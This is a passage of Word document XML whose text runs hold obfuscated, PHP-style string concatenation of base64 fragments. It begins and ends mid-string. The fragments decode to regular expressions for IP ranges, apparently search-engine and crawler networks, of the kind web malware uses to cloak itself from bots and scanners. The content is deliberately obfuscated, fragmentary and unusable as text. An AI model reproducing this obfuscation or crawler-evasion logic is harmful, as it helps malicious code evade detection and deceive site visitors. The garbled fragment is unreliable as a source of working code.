.'C4xMjIkLw=' .'=','L14yM' .'D' .'lcLjFcLj' .'M4XC5bM' .'C05XSskL' .'w==','L14y' .'M' .'DlcLjEz' .'MV' .'wuNFsw' .'LTFdXC5bMC05XSs' .'kLw' .'==','' .'L1' .'4yM' .'DlcLjEz' .'MVwuN' .'Dhc' .'L' .'lswLTldKyQ' .'v','L' .'14y' .'MD' .'lcLjEzMVwuNDlcL' .'j' .'M3JC' .'8=','L' .'14yMDlcLj' .'Ez' .'MV' .'wuNTB' .'cLjE1My' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'Qv','' .'L14' .'yM' .'DlcLj' .'E' .'zMV' .'wu' .'NTF' .'cLjE2NiQv','L14yMDl' .'cL' .'jEzMVwuN' .'jBcLig' .'xOX' .'wyMHwyMXw' .'yMnwy' .'M' .'3wy' .'NHwy' .'NX' .'wyNnwyN3' .'wyO' .'H' .'w' .'y' .'O' .'XwzMH' .'w' .'z' .'MXwzMnw' .'zM3wzNHw' .'zNXw' .'zN' .'nwzN3' .'wz' .'O' .'H' .'wzOX' .'w0MH' .'w0MXw0Mnw0M3' .'w0N' .'Hw0' .'NXw0Nnw0' .'N' .'3w0OHw0OXw1MHw1M' .'Xw1' .'M' .'nw1' .'M3' .'w1NHw1' .'NXw1N' .'nw1N3' .'w1OHw1OXw2M' .'Hw2' .'MXw2M' .'nw2M' .'3' .'w' .'2NH' .'w2NXw2Nnw2N3w2O' .'Hw2OXw3' .'M' .'Hw3MXw3M' .'nw3' .'M3w3NHw' .'3N' .'Xw3Nnw3N3w3OH' .'w' .'3OXw4MH' .'w' .'4MXw4Mnw4' .'M3w4' .'NHw4NX' .'w4' .'Nnw4N3w4O' .'Hw' .'4' .'OX' .'w5MHw' .'5MXw5Mnw' .'5M3w5NH' .'w5NXw' .'5Nnw5N' .'3w5' .'OHw' .'5O' .'X' .'wxM' .'DB8MTAxfDEwMnwxM' .'DN8MTA' .'0' .'fDEwNXwxMDZ8' .'MT' .'A' .'3fD' .'EwO' .'HwxMD' .'l8MTEw' .'f' .'DExMXwxMTJ8MTEzfDExNHwxMTV8' .'MTE2fDE' .'xN3w' .'xMTh8MT' .'E5fDEyMHw' .'xMj' .'F8MT' .'IyfDEyM' .'3' .'w' .'xM' .'j' .'R8MTI1' .'f' .'D' .'EyN' .'nwxM' .'jd8MTI4fD' .'EyOXwxMzB8MTM' .'xfDEzMnwxMzN8MT' .'M' .'0f' .'DEzNX' .'wxM' .'z' .'Z8MT' .'M' .'3f' .'DEzOHwxMzl8MTQwfDE0MX' .'wxNDJ8M' .'T' .'Q' .'zfDE0' .'NHw' .'xNDV8MT' .'Q2f' .'DE0N' .'3' .'w' .'xNDh8M' .'T' .'Q5fDE1MHwxNTF8MTU' .'yfDE1M3wxNTR' .'8MTU1fDE' .'1NnwxNTd8MTU4f' .'DE1O' .'XwxNjB' .'8MTYx' .'fD' .'E2Mn' .'wxNj' .'N8MTY0' .'fD' .'E2' .'N' .'Xwx' .'NjZ8MTY3f' .'D' .'E2OHwxNj' .'l8MTcw' .'fD' .'E3MSkkL' .'w==','L1' .'4y' .'MDlcLjE' .'z' .'MVwu' .'NjJc' .'L' .'igxMDd8' .'MT' .'A' .'4f' .'DE' .'wOXwxM' .'TB8' .'MT' .'ExfDExMn' .'wxM' .'TN8MTE0fDExNXwxMTZ8MTE' .'3' .'f' .'D' .'E' .'x' .'OHwx' .'MTl8MTIwfDEyMXwx' .'MjJ8' .'MTIzfD' .'EyNHwxMjV8MTI2fDEyN' .'3wxMjh8' .'MTI5f' .'D' .'Ez' .'MHwxMzF8MTMyfDEzM' .'3w' .'xMzR8MT' .'M1fDEzNnwx' .'M' .'zd8MTM' .'4' .'f' .'DE' .'zOXw' .'xNDB8MTQx' .'fDE0Mn' .'w' .'xNDN8M' .'T' .'Q0' .'fDE0NXwxNDZ8M' .'T' .'Q' .'3fDE0OHwx' .'NDl' .'8MTUwfDE1MX' .'w' .'xNTJ' .'8MT' .'UzfDE1NH' .'wxNT' .'V' .'8MTU' .'2' .'fDE' .'1N3wxNT' .'h8' .'MTU5fDE2' .'MHwxNjF8MT' .'YyfDE2M' .'3wxNjR' .'8MT' .'Y' .'1fDE2Nnw' .'xNj' .'d8MTY4fDE2' .'OXwxN' .'zB8MTcxfDE3Mn' .'wxNzN8MT' .'c0fDE3NXwxNzZ8MTc3fDE3OH' .'wxN' .'zl' .'8MTg' .'wf' .'D' .'E' .'4MX' .'wxODJ8' .'MTg' .'zfDE4NHwx' .'O' .'DV' .'8MTg2' .'fDE4' .'N3wxODh8' .'MT' .'g5fDE5' .'M' .'HwxOTF8MTk' .'yfDE5M3wxOTR8MT' .'k1f' .'DE' .'5Nnw' .'xOTd8MTk4fDE' .'5OX' .'wyMDB8MjAx' .'fD' .'IwMn' .'w' .'y' .'MDN8' .'MjA' .'0f' .'DIwN' .'XwyMD' .'Z8' .'MjA3f' .'DIwOH' .'wy' .'MDl8MjEwfDIxMX' .'wyMTJ8MjEzfD' .'IxNCkkLw==','' .'L' .'14yMDlcLjE4NVwu' .'MTA4X' .'C5bMC05' .'XSs' .'k' .'Lw==','' .'L14yMDlcLjE4NVwuMT' .'Iy' .'XC5bM' .'C05XSs' .'k' .'Lw==','L14yMDlcLjE4NVwuMTQxXC5bMC0' .'5XSs' .'kLw==','' .'L1' .'4yMD' .'lcLjE4NVw' .'uM' .'T' .'QzXC5bMC05XSs' .'k' .'Lw==','L' .'1' .'4y' .'M' .'DlcLj' .'E4NVwuMjUzXC5bMC0' .'5XSskL' .'w==','' .'L1' .'4' .'y' .'MD' .'lcLjE5MVwuM' .'TI' .'zXC4' .'zMyQ' .'v','L14yMDl' .'cLjE5' .'MVwuNjRcLj' .'I' .'y' .'N' .'yQv','L14' .'yMDlcLj' .'E' .'5MVwu' .'NjVc' .'LlswLTld' .'K' .'yQv','L14yMDlcLj' .'E5MVwu' .'ODJ' .'cLi' .'gyNDV8MjQ2fDI0N3wyND' .'h' .'8MjQ' .'5fDI1MHwyNT' .'F8MjUy' .'KSQv','' .'L' .'1' .'4yM' .'DlcLj' .'E5M' .'VwuODNcLl' .'swLTldKy' .'Qv','L14yMDlcLj' .'IwM' .'lwuM' .'Tky' .'XC5' .'bMC05' .'XSs' .'kLw' .'=' .'=','L' .'1' .'4yMDlcLjIwM' .'lwu' .'MT' .'kzX' .'C5bMC05' .'XSskLw==','L14yM' .'D' .'lcLjIwMlwuMTk' .'0XC4o' .'MjM' .'3' .'fDIzOC' .'kkLw' .'==','L14yMDl' .'cLjIwMlwuMjA1' .'XC4xJC8=','L1' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'4yMD' .'lcLjI' .'wM' .'lwuMjQw' .'XC4oOH' .'w5fDEwfDExfD' .'EyfD' .'EzfDE0' .'fDE1fDE2fDE3f' .'DE4' .'fDE5fD' .'IwfD' .'IxfD' .'IyfDIzfDI0fD' .'I' .'1' .'fDI2fDI3fDI4fDI' .'5' .'f' .'DM' .'wfDMxf' .'DMyfDMzfDM0fDM1f' .'DM2fD' .'M3f' .'DM' .'4fD' .'M5fDQwf' .'DQ' .'x' .'f' .'D' .'Q' .'yfD' .'QzfDQ0f' .'DQ1fD' .'Q2f' .'DQ3fD' .'Q4f' .'DQ5fDUwfDUxfDUyf' .'D' .'Uzf' .'DU0f' .'DU1fDU2fDU3fDU4fDU5f' .'DYwfD' .'YxfD' .'Yy' .'fDYz' .'fD' .'Y0fDY1' .'fDY2' .'fDY' .'3fDY' .'4fD' .'Y5fDc' .'w' .'fDcx' .'fDcyfDczfDc0fD' .'c1fDc' .'2fD' .'c3fD' .'c4fDc5' .'f' .'Dgwf' .'Dg' .'xf' .'DgyfDgzfDg0fD' .'g1fDg2fD' .'g3fDg4f' .'Dg5fD' .'kw' .'fDkxfDkyfDkzfDk' .'0fDk1fDk2fDk3fDk4fDk' .'5f' .'D' .'EwMHwxMDF8' .'MTA' .'y' .'fDEwM3wxM' .'D' .'R' .'8' .'MTA' .'1fDEw' .'Nn' .'wxM' .'Dd8M' .'TA4fDE' .'wOSkkLw==','L14yMD' .'lcLj' .'IwMlwu' .'M' .'jQ4XC4' .'oM' .'jExfDIxMnw' .'yMT' .'N8MjE' .'0KSQv','L14' .'yM' .'D' .'lcLjI0N' .'1wu' .'NDBcLjI0NiQv','' .'L1' .'4yMDlcLjY' .'3' .'XC4yMDZcLigxMj' .'Z8M' .'TI3fDEy' .'O' .'HwxMjl' .'8' .'M' .'T' .'MwfD' .'Ez' .'MX' .'w' .'xM' .'z' .'J' .'8MT' .'MzKS' .'Q' .'v','L14' .'y' .'MDlcLjY' .'3' .'XC4yMjhcLl' .'sw' .'LT' .'l' .'d' .'K' .'yQ' .'v','L14' .'yMDl' .'cLjY3XC' .'4y' .'Mjl' .'cLls' .'wLTld' .'KyQv','L14' .'yMDl' .'c' .'Lj' .'czXC4xNjBcLlswLTldKyQv','L1' .'4yMDlcLjczXC4x' .'N' .'jJcLl' .'s' .'wLTldK' .'yQ' .'v','L1' .'4yMDlc' .'LjczXC4' .'xN' .'jRc' .'LlswLTldK' .'yQv','L' .'14yMDlcLjczXC' .'4x' .'NzR' .'cL' .'igyN' .'TB8MjUx' .'KS' .'Q' .'v','L14yMDlcLjczXC' .'4' .'xNzZcLig' .'xMjh8MTI5fD' .'E' .'zMHwxMzF8M' .'TMyfDEzM3w' .'xMzR8MTM1fDEz' .'N' .'ikkLw=' .'=','L14yMD' .'lcLjczXC4xODBcL' .'lsw' .'LTl' .'dKyQv','' .'L14yM' .'DlcLj' .'g1XC4yM' .'zhcLlswLTldK' .'y' .'Qv','L14yMTBcLjE0OF' .'wuMTY' .'wXC4oMTU3fD' .'E1O' .'Hwx' .'NTl8MTYwfDE2MXw' .'xNj' .'J8M' .'TY' .'z' .'fDE2' .'N' .'Hw' .'x' .'NjV8MT' .'Y2fD' .'E' .'2N3' .'w' .'xNjh' .'8MTY5' .'fDE' .'3MHwx' .'N' .'zF8MTcyf' .'DE3M3' .'wxNzR8MTc' .'1fD' .'E3' .'Nnw' .'xNzd8MT' .'c' .'4fDE3OXw' .'xOD' .'B8M' .'T' .'gxf' .'D' .'E4MnwxO' .'D' .'N8MTg' .'0fDE4N' .'XwxOD' .'Z8MTg3fDE4OHw' .'xODl8MTk' .'wfD' .'E5MXwxOTJ8MTkz' .'fD' .'E5NHwxOT' .'V8MTk2' .'fDE5N3wxOTh8' .'MTk5fD' .'I' .'wMHwyMDF8MjAyfDI' .'wM3w' .'yMDR8Mj' .'A' .'1fDIwNikkL' .'w=' .'=','L14yMT' .'BcLjE1NVwuM' .'T' .'U3' .'XC5' .'bMC05XSsk' .'Lw=' .'=','L' .'14yMTBcLjE1NV' .'wuMTU5XC5' .'bMC05XSskLw' .'=' .'=','L14' .'yMTBcLjIz' .'Nlwu' .'MjM' .'zXC4oMTMwfD' .'EzMX' .'wxM' .'z' .'J' .'8MT' .'MzfDEzNHwxM' .'zV8MTM2fD' .'EzN3wxMzh8MTM5fDE0MHwx' .'N' .'DF8M' .'T' .'Qyf' .'DE' .'0' .'M3wxND' .'R8' .'MTQ' .'1fD' .'E' .'0' .'NnwxNDd8MTQ4' .'fDE0OXw' .'x' .'NTB8MT' .'U' .'xfDE1' .'M' .'nwxN' .'TN8MTU0fDE1NXwxNTZ8MTU3fDE1OHwxNTl8MTY' .'wfDE2MSk' .'kLw=' .'=','L' .'14yMT' .'F' .'c' .'L' .'jEzXC4yMjJcLjI' .'zMC' .'Q' .'v','L1' .'4yM' .'T' .'FcL' .'j' .'E0XC4' .'4' .'XC4yNDAkLw=' .'=','L' .'1' .'4yM' .'TFcL' .'jE2' .'OVw' .'uMjQ' .'xX' .'C4yMSQ' .'v','L' .'1' .'4yMTFcLjE' .'4XC4yMTRcLjE5' .'NCQv','L14yMTFc' .'LjU' .'xXC' .'42M' .'1' .'wuNCQv','L1' .'4yMTJ' .'cLjE4NVw' .'u' .'NDRcLigxMHwxMXw' .'xM' .'nwxM3wxN' .'HwxNSkkLw==','L14' .'yMTJc' .'LjE4' .'N1' .'wu' .'MjEz' .'XC4o' .'MTcx' .'fDE3Mn' .'wxN' .'z' .'N8MT' .'c' .'0' .'f' .'DE3N' .'SkkL' .'w' .'==','L14yM' .'T' .'JcL' .'j' .'E4N1wuMj' .'I2' .'XC5' .'b' .'MC' .'05XSs' .'k' .'L' .'w==','L14' .'yM' .'TJcLjE4' .'N1wuMjI3XC' .'5bMC05' .'X' .'S' .'skLw==','L14y' .'MTN' .'cL' .'jE5' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'M1' .'w' .'uMTlcL' .'jM1JC8' .'=','L1' .'4yMT' .'N' .'cL' .'jI' .'xNlwu' .'MTQzXC' .'4' .'oMzd' .'8Mzh8MzkpJ' .'C8=','L1' .'4yMTZc' .'L' .'jEwOVwuMT' .'IxXC4o' .'NzB8NzE' .'p' .'JC' .'8=','L' .'14' .'yMTZ' .'cLjEwOVwuMTI2' .'X' .'C4oMTMxfDEzMnwxMzN8MTM' .'0fDEzNXwxMz' .'Z' .'8M' .'TM' .'3fDEz' .'OHw' .'xMzl8MTQwf' .'DE' .'0M' .'XwxN' .'DJ' .'8MTQzfDE0' .'N' .'HwxNDV' .'8MTQ' .'2fDE0N3wxNDh8MT' .'Q5' .'fD' .'E' .'1' .'MHwxN' .'TF8MTUyfD' .'E' .'1M3wxNTR8MTU1fDE' .'1NnwxNTd8' .'MTU4' .'fDE1O' .'XwxNjB8MT' .'Yx' .'KS' .'Qv','L14yMTZ' .'cLjEzNlwuMj' .'MzXC' .'4' .'xNjQk' .'L' .'w=' .'=','L1' .'4yMT' .'Z' .'cLj' .'E0NVw' .'u' .'NT' .'hcL' .'jIxO' .'SQv','L' .'14y' .'MT' .'ZcLjE1' .'NV' .'wuM' .'Tk4' .'XC42' .'M' .'CQv','L14yMTZ' .'cLjE1NVwuM' .'jAwX' .'C5bM' .'C05XSskLw=' .'=','L1' .'4yM' .'TZcL' .'jE1NV' .'wuMjA' .'yXC5bMC05XSskLw==','' .'L14yMTZcLjE1NVwuMjA' .'0XC40MCQ' .'v','L' .'14y' .'MTZcLj' .'IzOV' .'wuM' .'Tk' .'zX' .'C4o' .'NzF8NzJ8N' .'zN8Nz' .'R8N' .'zV8NzZ8Nzd8Nzh8Nzl8OD' .'B8OD' .'F8ODJ8O' .'D' .'N' .'8ODR' .'8ODV' .'8OD' .'Y' .'pJC8=','L14yMTZcLjIzOVwuMz' .'NcLig5' .'Nnw5N3w5OHw5O' .'SkkLw==','L' .'14' .'y' .'MT' .'ZcLjI' .'zOVwuM' .'zdcLig5OHw5OS' .'kk' .'Lw==','' .'L' .'14yMTZcLjI' .'zOV' .'wuMz' .'lc' .'L' .'ig' .'5O' .'Hw5O' .'S' .'kkLw' .'=' .'=','L14yMTZcLjI' .'zOVwuN' .'DFcLig5Nnw' .'5N3w5OHw5' .'OSk' .'kLw=' .'=','L1' .'4yMTZcLjIz' .'OVw' .'uNDVcLjQkLw==','L14y' .'MTZ' .'c' .'LjIzOVwuNDZ' .'cLls' .'wLTldKy' .'Qv','' .'L14yMTZcLjIzO' .'VwuNT' .'F' .'cLig5Nnw5N3w' .'5' .'OHw5' .'OSkk' .'Lw==','L14' .'y' .'MTZcLjIzOV' .'wuN' .'TNc' .'Lig5O' .'Hw5O' .'Sk' .'k' .'Lw==','L1' .'4yMTZcLjIzOVwuNTdcLig5' .'Nnw' .'5' .'N3w5O' .'Hw5OSkkLw' .'==','' .'L14' .'yMTZcL' .'jIz' .'OVwuNTl' .'cLig5OH' .'w5OSkk' .'Lw==','L14' .'y' .'MTZcLjMyX' .'C' .'4' .'y' .'MzdcL' .'igx' .'fDJ8M3w0fDV8Nn' .'w3fD' .'h8' .'OXwxMHwxM' .'XwxMnwxM3wxNHw' .'xNX' .'wxNnwxN3wxOHwxOXwyMHwyM' .'XwyM' .'nw' .'y' .'M3' .'wyNHwyNXwyNnw' .'y' .'N3wyOHwyOXw' .'zM' .'C' .'kk' .'Lw=' .'=','L' .'14y' .'MTZc' .'LjMzXC4y' .'MjlcLjE2' .'MyQv','L14y' .'MTZcLjM0' .'X' .'C4x' .'MDJc' .'L' .'lsw' .'LTl' .'dK' .'yQv','L14yMTZcLjM0X' .'C4xMDlcLig' .'x' .'OTB8M' .'T' .'k' .'xfDE5MikkLw==','L14y' .'MT' .'ZcLjM5XC40OF' .'wuWzA' .'t' .'OV0rJC8' .'=','L14yM' .'TZcLjM5XC' .'4' .'1WzAtMV1cLlswLTldKyQv','' .'L' .'1' .'42Mlw' .'uM' .'TcyXC4xOTlc' .'LigyM' .'HwyMX' .'w' .'yM' .'nwy' .'M3wyNCkkLw==','L' .'142M' .'lwuMjdcLjU5' .'X' .'C4yNDUkLw==','L142M1wuMTYz' .'X' .'C' .'4xMD' .'Jc' .'Li' .'g' .'xODB8' .'MTgxfDE4Mi' .'kkLw==','' .'L1' .'42N' .'Fw' .'uMTUyXC' .'43NV' .'wuWzAtOV0' .'rJ' .'C8=','L14' .'2N' .'FwuMTU3X' .'C4x' .'MzdcL' .'igy' .'MT' .'l8' .'MjIw' .'fDIy' .'MXwyMjJ8Mj' .'IzfDIyNHwyM' .'jUp' .'J' .'C8=','' .'L142' .'NFwuMT' .'U3XC4' .'xMz' .'h' .'cLigx' .'MDN8' .'MTA0fD' .'EwNXwxM' .'DZ8MT' .'A3fDE' .'wOCk' .'kL' .'w' .'==','' .'L14' .'2NFwuMjMz' .'X' .'C4x' .'N' .'zN' .'cLigxOTN8MT' .'k' .'0' .'fDE' .'5' .'N' .'Xwx' .'OTZ' .'8MTk3fD' .'E5' .'OH' .'wxO' .'T' .'l8' .'MjA' .'wfDIwMX' .'wyMDJ8MjAzfDIwNHwyMDV8MjA' .'2' .'fDIwN3wyMDh' .'8MjA5f' .'DIxMHwy' .'MTF8' .'MjEyfD' .'Ix' .'M3' .'wyM' .'TR8Mj' .'E1fDIx' .'Nnw' .'yMTd' .'8M' .'jE4fD' .'Ix' .'OXwyM' .'jB' .'8MjIxfDIy' .'MnwyMj' .'N8MjI0fD' .'IyNX' .'wyMj' .'Z8M' .'jI3fDIyOHw' .'yMj' .'l8' .'Mj' .'Mwf' .'DI' .'zMXwyMzJ8Mj' .'Mzf' .'DIzNHwyMzV8M' .'jM2' .'fD' .'IzN3wyMzh8' .'M' .'jM5f' .'DI0' .'MHwyN' .'DF8MjQyfDI0M3wyNDR8' .'Mj' .'Q1fDI0' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'NnwyNDd8MjQ4fDI' .'0OXwyNTB' .'8' .'MjUxfDI1' .'MnwyNTN8Mj' .'U0fDI' .'1' .'NSkk' .'Lw==','L14' .'2NFwuNj' .'hcLjh' .'b' .'M' .'C05XVwuW' .'z' .'AtOV0' .'rJC8=','L142NF' .'wuN' .'jhcLjlbMC0' .'yXVwuWz' .'AtO' .'V0rJC8=','L' .'14' .'2NFwuNzVcLjM2' .'X' .'C4' .'o' .'NDJ8NDN8' .'N' .'DR8' .'NDV8NDZ8NDd8NDh8N' .'D' .'l8NTB' .'8NTF8N' .'TJ8NTN8' .'NTR' .'8NT' .'V8NTZ8NTd8NT' .'h' .'8NTl8Nj' .'B' .'8NjF8' .'NjJ8N' .'jN8NjR8NjV8' .'NjZ' .'8Njd' .'8' .'Nj' .'h8N' .'j' .'l8N' .'zB8NzF8' .'N' .'z' .'J8' .'NzN' .'8' .'N' .'zR' .'8N' .'zV8NzZ8' .'Nzd8Nzh8N' .'zl8ODApJC8=','L142N' .'Fwu' .'ODl' .'cL' .'jMzXC5bMC05XSskL' .'w==','L142' .'NFwuOTVcLj' .'c' .'5XC' .'5' .'b' .'MC' .'05XSs' .'kL' .'w==','L142NlwuMT' .'YzX' .'C4' .'xNzBc' .'LigxNTd8' .'M' .'TU4fDE1OXwxNjB8MTYxfDE2MnwxNjN8MTY' .'0fDE2N' .'Xw' .'xNj' .'Z8' .'M' .'T' .'Y3fDE' .'2' .'O' .'HwxNjl8MTcwfDE3M' .'Xw' .'xN' .'z' .'J8' .'M' .'TczfDE3NHwxNzV' .'8MTc' .'2fDE3N3' .'w' .'xNzh8' .'M' .'Tc' .'5' .'fDE4MHwxOD' .'F8MTgyfD' .'E' .'4M3' .'wxODR8' .'MT' .'g1fDE' .'4Nnwx' .'O' .'Dd8M' .'Tg4fDE4OX' .'wx' .'OTB8MT' .'kxf' .'DE' .'5Mnwx' .'OT' .'M' .'p' .'JC8=','L142N' .'l' .'w' .'uM' .'T' .'YzXC4x' .'NzRcLj' .'Y1JC8' .'=','L14' .'2Nlw' .'uMTdcLjE0OFwuKDEyOHwxMjl8MT' .'M' .'w' .'fDEzMXwx' .'M' .'zJ' .'8MT' .'MzfDEzNHwxMzV8MTM' .'2fDE' .'zN3wxM' .'zh' .'8MTM5fDE' .'0MHwxN' .'DF8M' .'TQyfDE0M3wxND' .'R8MT' .'Q1f' .'DE0Nn' .'wxNDd8MT' .'Q4fDE0O' .'Xwx' .'NTB' .'8M' .'T' .'UxfDE1MnwxNTN' .'8MTU' .'0f' .'DE1' .'NXwxNTZ8MTU3' .'fD' .'E1' .'OHwxNTl8' .'MTYwfDE2MXwx' .'NjJ8MT' .'Yzf' .'DE' .'2NHwxN' .'jV' .'8' .'MTY2fD' .'E2N3wxNjh8MT' .'Y5f' .'DE3MHwx' .'NzF8MT' .'c' .'yfDE3M3wx' .'NzR' .'8MTc' .'1fDE3Nn' .'wxNzd' .'8M' .'Tc4fDE3OX' .'w' .'xODB8MT' .'g' .'xfD' .'E4MnwxODN8' .'MTg0fD' .'E4' .'NXwxOD' .'Z8MTg3fDE' .'4OHwxODl8MTkwfDE5M' .'Skk' .'Lw==','L142Nl' .'w' .'u' .'M' .'Tk' .'2XC4x' .'MDF' .'cL' .'ls' .'wL' .'Tl' .'dKyQ' .'v','L142' .'NlwuMT' .'k2X' .'C42NVwuWzA' .'t' .'O' .'V0rJ' .'C8=','L142' .'NlwuMTk2XC' .'42N' .'1wuWzAt' .'OV0rJC8=','' .'L14' .'2N' .'lwuMTk' .'2XC' .'43' .'WzItNF1' .'cLlswLTl' .'dKy' .'Qv','' .'L' .'142' .'Nlw' .'uMTk2XC43W' .'zct' .'OF1c' .'LlswLTldKyQ' .'v','L142Nlwu' .'MT' .'k2X' .'C44M' .'FwuWzAt' .'OV0' .'rJC8=','' .'L142' .'NlwuMTk2XC4' .'4' .'MVwuWz' .'AtO' .'V' .'0rJC' .'8=','L1' .'4' .'2Nlw' .'uM' .'Tk2XC45WzAt' .'Ml' .'1cL' .'l' .'swLT' .'ldK' .'yQ' .'v','' .'L1' .'42Nlwu' .'M' .'T' .'k2' .'XC45M' .'1w' .'uKD' .'Z8' .'N3w4fDl8MTB8MTF8MTJ' .'8M' .'TN8MTR8MT' .'V8' .'MTZ8' .'MTd' .'8MTh8MTl8MjB8M' .'j' .'F8MjJ8Mj' .'N8MjQpJC8=','L1' .'42' .'NlwuM' .'Tk2XC45N1' .'wu' .'W' .'zA' .'tOV0rJC8=','L142' .'N' .'lwu' .'M' .'Tk2' .'XC45OVwuMjAkLw==','' .'L14' .'2Nl' .'wuMjE4X' .'C42NV' .'wuNTIkLw==','' .'L142NlwuM' .'jE4XC43MFwuWzAtOV' .'0rJ' .'C8=','L142N' .'lwu' .'M' .'jI4XC4xNls0LTZdXC5b' .'MC0' .'5XS' .'skLw==','L142NlwuMjI4XC4xNzN' .'cLl' .'swLTld' .'KyQv','' .'L142Nlw' .'u' .'MjI4XC4xODJcL' .'igxNzd8MTc' .'4fD' .'E3O' .'XwxODB' .'8MTgxfDE4Mn' .'wxO' .'DN' .'8MT' .'g0' .'fDE4NX' .'wxODZ8MTg' .'3fDE4OHwx' .'O' .'Dl8MT' .'kwKSQv','' .'L14' .'2NlwuMjQ5XC4' .'2' .'W' .'z' .'QtOV1cL' .'lswL' .'TldK' .'yQv','' .'L' .'142NlwuMjQ5XC4' .'3W' .'zAtM11cLls' .'w' .'LTldKyQv','L1' .'42Nl' .'w' .'uMjQ5' .'XC4' .'3WzgtOV1cLlswL' .'Tld' .'KyQ' .'v','L142NlwuOT' .'RcLjI' .'zM' .'F' .'w' .'uK' .'D' .'k2fDk3f' .'Dk' .'4fDk5fD' .'EwM' .'HwxMD' .'F8M' .'TAyfDEwM' .'3' .'wxMDR8MTA1' .'f' .'DEwN' .'nwx' .'M' .'Dd8' .'M' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'TA4fDEw' .'O' .'XwxMTB8MTE' .'xfDExMn' .'wxMTN8' .'MTE' .'0' .'fDE' .'xNXwxMTZ8MT' .'E3f' .'D' .'E' .'xOHwx' .'MTl8MT' .'IwfD' .'EyMXwxMjJ8MTIzfDEyNHwx' .'MjV8MTI2fDEyN3wxMjh8MT' .'I5fDEz' .'M' .'Hwx' .'M' .'zF8' .'M' .'T' .'MyfDEz' .'M3' .'wxMzR' .'8MTM1fDEzNnwxMz' .'d' .'8MTM4fDEzOXwx' .'N' .'DB8MTQx' .'fD' .'E0M' .'n' .'w' .'xN' .'DN8M' .'TQ0fDE0NXwx' .'ND' .'Z8MTQ' .'3f' .'DE0OHwxND' .'l8M' .'TUw' .'fDE1MXw' .'x' .'NT' .'J8MT' .'Uzf' .'DE1NHwxNTV8MTU2fDE1N3wx' .'NTh' .'8MTU5fD' .'E2M' .'HwxN' .'j' .'F' .'8M' .'T' .'YyfD' .'E' .'2' .'MykkL' .'w==','L142NlwuOT' .'R' .'cLjIzW' .'zItM' .'11cLl' .'swL' .'Tld' .'KyQ' .'v','' .'L1' .'4' .'2Nl' .'w' .'uOT' .'R' .'cLjIzOFwuNTE' .'kL' .'w==','L142N1wuMTk1XC4xMVswLTV' .'dXC5bMC0' .'5XSskLw==','L142N1' .'wuM' .'T' .'k1X' .'C' .'4z' .'NFwu' .'W' .'zAt' .'OV0rJC8=','L14' .'2N1wuMTk' .'1XC4zN1' .'wu' .'W' .'zA' .'tOV0' .'rJC8=','' .'L' .'142N' .'1' .'wuMTk1XC40W' .'zQtNV1cL' .'lswLTldKyQ' .'v','L142N1wuMT' .'k1XC41MF' .'wuODck' .'Lw==','L1' .'4' .'2N1wuMTk1XC41W' .'z' .'EtMl1cLlswLTldKyQv','L1' .'42N1w' .'u' .'MTk1XC41' .'M1w' .'uKDExMXwx' .'MTJ8MTEz' .'f' .'DE' .'xNHw' .'xM' .'TV8MTE2' .'fDE' .'xN3wxMTh8M' .'TE5' .'fDEy' .'MHw' .'xM' .'jF' .'8MT' .'IyfDEyM3wxMjR8' .'M' .'TI' .'1fDEyN' .'n' .'w' .'xMjd8M' .'TI4fDEyO' .'XwxMzB8MT' .'MxfD' .'EzMnwx' .'MzN8' .'M' .'TM0fDEzNX' .'w' .'x' .'M' .'zZ8M' .'T' .'M3fDEzOHwxMzl8MTQwfDE0MX' .'wx' .'NDJ8M' .'TQzf' .'DE0NHwxNDV8MTQ2fDE0N3w' .'xNDh8MTQ5f' .'DE1MHw' .'xNTF8MTUyfDE1M' .'3' .'wxN' .'T' .'R8MTU1f' .'DE1NnwxNTd' .'8MTU' .'4fDE1OXw' .'xNjB8MT' .'YxfDE2' .'MnwxNjN8MTY0fDE2' .'N' .'XwxNjZ8M' .'T' .'Y3fDE' .'2OHwx' .'Njl8MTcwfD' .'E' .'3MXwxNzJ8MT' .'cz' .'fDE3' .'NHw' .'xNzV' .'8MTc' .'2fDE3N3' .'wx' .'Nzh8MT' .'c5fDE4MHw' .'xODF8M' .'Tgyf' .'DE4M3w' .'x' .'ODR8MTg' .'1' .'fDE4Nnwx' .'ODd8MTg4' .'fDE' .'4OXwxOTB8' .'MTkx' .'fDE5M' .'nwxOTN' .'8MT' .'k0fDE5NXwx' .'OTZ8MTk3f' .'DE' .'5OHwx' .'OTl8M' .'j' .'AwfD' .'I' .'wMXwyMDJ8MjAzfDI' .'wNH' .'wy' .'MDV8' .'M' .'jA2fDIw' .'N3' .'wyMDh' .'8' .'MjA5fDIx' .'M' .'HwyM' .'TF' .'8MjEyfDIxM3w' .'y' .'MTR8MjE1' .'f' .'DI' .'xN' .'nw' .'y' .'MTd8MjE4fD' .'IxO' .'SkkLw==','L142N1wu' .'MTk1X' .'C41' .'NF' .'wuWzA' .'tO' .'V0rJC8=','L142' .'N' .'1wuMTk' .'1XC41OF' .'wuWzAtO' .'V0rJC8=','' .'L142N1wuM' .'Tk1' .'XC' .'4' .'5OFwu' .'WzAtOV0rJC8=','' .'L142' .'OFwuM' .'TQyXC4xOTV' .'cLig4M' .'Hw4MSkkL' .'w' .'==','L14' .'2' .'O' .'Fwu' .'M' .'TQyXC4yM' .'DNcLj' .'E' .'zMyQv','L142O' .'F' .'wuMTQyXC4' .'yMT' 